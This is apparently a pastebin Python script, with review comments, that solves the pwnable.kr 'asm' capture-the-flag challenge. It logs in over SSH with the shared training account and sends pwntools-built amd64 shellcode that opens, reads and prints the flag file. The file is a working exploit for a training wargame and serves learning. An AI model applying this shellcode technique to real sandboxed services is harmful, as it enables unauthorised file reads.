
Untitled

a guest
Jul 3rd, 2017
"""pwntools client for the `asm` service on pwnable.kr.

Logs in over SSH, connects from that host to localhost:9026, and sends
assembled amd64 shellcode that opens the file named by ``flag_name``, reads
up to 1024 bytes of it onto the stack and writes 1024 bytes to fd 1.

Written for Python 2 (``raw_input``, ``str`` payload).
"""
from pwn import *

context.update(arch='amd64', os='linux')

# Needs a local copy of the binary (the download step below is disabled).
# NOTE(review): `elf` is not used again in this script.
elf = ELF('./asm')
flag_name = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'

# --- remote target, reached through the SSH account ---
# NOTE(review): the credentials are embedded in the script. That is fine only
# for a shared training account; otherwise read them from the environment.
shell = ssh(host='pwnable.kr', port=2222, user='asm', password='guest')
# Disabled alternatives kept from the original:
#   shell.download_file('asm')        # fetch the binary for local analysis
#   conn = shell.process('./asm')     # run the binary inside the SSH session
conn = shell.connect_remote('localhost', 9026)

# --- local target (disabled) ---
#   conn = process('./asm')

# Blocks until Enter is pressed; presumably a pause for attaching a debugger.
raw_input('press_any_key')

# The shellcode uses only open/read/write. A syscall allow-list that still
# permits those three protects only what the filesystem view and the process
# privileges keep out of reach.
stages = [
    # Push the file name onto the stack so rsp points at the path string.
    shellcraft.amd64.pushstr(flag_name),
    # open(path=rsp) with shellcraft's default flags; the fd comes back in rax.
    shellcraft.amd64.open('rsp'),
    # read(fd=rax, buf=rsp, 1024): the data overwrites the stack at rsp.
    shellcraft.amd64.read('rax', 'rsp', 1024),
    # write(1, rsp, 1024): the length is fixed, not the count read() returned,
    # so the output can carry stack bytes past the end of the file content.
    shellcraft.amd64.write(1, 'rsp', 1024),
]
payload = ''.join(stages)
log.info(payload)  # log the assembly source before assembling it
payload = asm(payload)

banner = conn.recvuntil("shellcode: ")
log.info(banner)
conn.send(payload)
# A single recv() may return fewer than 1024 bytes.
log.success(conn.recv(1024))